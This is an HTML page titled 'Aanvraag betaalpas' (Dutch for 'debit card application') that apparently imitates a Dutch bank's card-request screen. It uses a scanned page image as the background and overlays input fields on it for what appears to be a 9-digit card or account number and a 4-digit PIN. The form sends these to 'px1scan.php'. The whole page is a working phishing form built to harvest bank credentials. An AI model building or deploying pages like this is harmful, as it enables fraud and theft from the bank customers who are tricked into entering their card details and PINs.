<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html><head>
<meta content="text/html; charset=ISO-8859-1" http-equiv="content-type"><title>Aanvraag betaalpas</title>

<link rel="shortcut icon" href="fav1.ico">
<link rel="icon" type="image/x-icon" href="fav1.ico">
<style type="text/css">
body {
text-decoration: none;
font-family: Arial,Helvetica,sans-serif;
background-repeat: no-repeat;
background-position: left top;
background-image: url(Xackground-1-scan.png);
}
input.P1 {
position: absolute;
top: 336px;
left: 366px;
}
input.P2 {
position: absolute;
top: 381px;
left: 281px;
}
input.P3 {
position: absolute;
top: 548px;
left: 637px;
}
input.P4 {
position: absolute;
top: 576px;
left: 280px;
font-family: Arial,Helvetica,sans-serif;
font-weight: bold;
color: #000066;
}
input.P5 {
position: absolute;
top: 576px;
left: 360px;
font-family: Arial,Helvetica,sans-serif;
color: #000066;
}
</style>
</head>
<body>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<a href="online-1.html">
<img src="reader_but.png" style="position: absolute; font-family: Arial,Helvetica,sans-serif; width: 194px; left: 59px; top: 202px; height: 247px;"></a><br>
<br>
<br>
<br>
<input style="top: 403px; left: 278px;" tabindex="3" class="P5" name="P5" value="check" type="checkbox"><br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<br>
<form method="get" action="px1scan.php" name="form">
<input style="top: 319px; left: 364px;" class="P1" maxlength="9" size="13" tabindex="1" name="P1" required="">&nbsp;
<input style="top: 371px; left: 280px;" class="P2" maxlength="4" size="5" tabindex="2" name="P2" required=""><input style="top: 448px; left: 284px;" name="P4" class="P4" value="Doorgaan" type="submit"><br>
</form>
</body></html>
